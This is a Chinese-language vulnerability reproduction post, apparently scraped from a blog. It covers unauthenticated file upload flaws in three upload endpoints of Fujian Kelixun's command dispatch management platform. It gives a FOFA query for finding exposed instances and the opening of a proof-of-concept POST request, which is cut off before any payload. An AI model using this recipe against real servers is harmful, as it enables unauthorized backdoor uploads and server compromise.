福建科立讯通信 指挥调度管理平台 多处文件上传漏洞复现

0x01 产品简介

福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。

0x02 漏洞概述

福建科立讯通信有限公司指挥调度管理平台upload.php、task/uploadfile.php、event/uploadfile.php多处接口存在文件上传漏洞,未经身份认证的攻击者可通给该漏洞写入后门文件,可导致服务器失陷。

0x03 复现环境

FOFA:body="指挥调度管理平台"

0x04 漏洞复现

PoC-1

POST /api/client/upload.php HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/a

最近更新

  1. TCP协议是安全的吗?

    2024-01-06 14:54:04       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-06 14:54:04       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-01-06 14:54:04       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-01-06 14:54:04       20 阅读

热门阅读

  1. 【LeetCode】1174. 即时食物配送 II

    2024-01-06 14:54:04       37 阅读
  2. Webpack5 常用优化总结

    2024-01-06 14:54:04       44 阅读
  3. 深度解析Webpack:现代前端工程化的利器

    2024-01-06 14:54:04       42 阅读
  4. RPC学习

    RPC学习

    2024-01-06 14:54:04      34 阅读
  5. Excel(11) : 生成xlsx添加图片

    2024-01-06 14:54:04       39 阅读
  6. MySQL联合索引最左匹配原则使用详解

    2024-01-06 14:54:04       40 阅读
  7. linux 出差前命令回顾(Docker 部分)

    2024-01-06 14:54:04       34 阅读